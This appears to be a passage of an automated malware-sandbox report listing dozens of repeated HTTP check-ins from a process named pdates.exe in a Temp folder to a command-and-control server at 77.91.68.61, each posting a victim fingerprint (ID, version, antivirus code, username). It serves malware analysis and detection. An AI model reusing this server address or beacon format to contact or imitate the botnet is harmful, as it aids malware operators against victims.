Jul 27, 2023 01:33:12.922636032 CEST	2890	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:12.971185923 CEST	2890	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
450	192.168.2.5	50170	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:59.268022060 CEST	4059	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:59.315963030 CEST	4059	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
451	192.168.2.5	50171	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:59.498482943 CEST	4060	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:59.547661066 CEST	4060	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
452	192.168.2.5	50172	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:59.799813032 CEST	4061	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:59.851345062 CEST	4061	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
453	192.168.2.5	50173	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:00.007693052 CEST	4062	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:00.057920933 CEST	4062	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
454	192.168.2.5	50174	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:00.249025106 CEST	4063	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:00.297267914 CEST	4063	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
455	192.168.2.5	50175	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:00.536084890 CEST	4064	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:00.586014986 CEST	4064	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
456	192.168.2.5	50176	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:00.754386902 CEST	4065	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:00.802856922 CEST	4065	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
457	192.168.2.5	50177	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:00.956306934 CEST	4066	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:01.004926920 CEST	4066	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
458	192.168.2.5	50178	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:01.183969021 CEST	4067	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:01.232585907 CEST	4067	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
459	192.168.2.5	50179	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:01.397494078 CEST	4068	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:01.447036028 CEST	4068	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	49763	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:13.175569057 CEST	2891	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:13.224049091 CEST	2891	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
460	192.168.2.5	50180	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:01.611268044 CEST	4069	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:01.660238028 CEST	4069	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
461	192.168.2.5	50181	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:01.831653118 CEST	4070	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:01.880060911 CEST	4070	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
462	192.168.2.5	50182	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:02.075645924 CEST	4070	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:02.124536991 CEST	4071	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
463	192.168.2.5	50183	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:02.288458109 CEST	4071	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:02.336810112 CEST	4072	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
464	192.168.2.5	50184	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:02.522789955 CEST	4072	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:02.571909904 CEST	4073	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
465	192.168.2.5	50185	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:02.750274897 CEST	4073	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:02.798386097 CEST	4074	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
466	192.168.2.5	50186	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:02.955490112 CEST	4074	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:03.004086018 CEST	4075	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
467	192.168.2.5	50187	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:03.195997953 CEST	4075	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:03.244323969 CEST	4075	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
468	192.168.2.5	50188	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:03.417381048 CEST	4076	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:03.466233969 CEST	4076	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
469	192.168.2.5	50189	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:03.629734039 CEST	4077	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:03.678180933 CEST	4077	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.5	49764	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:13.582711935 CEST	2892	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:13.631290913 CEST	2892	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
470	192.168.2.5	50190	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
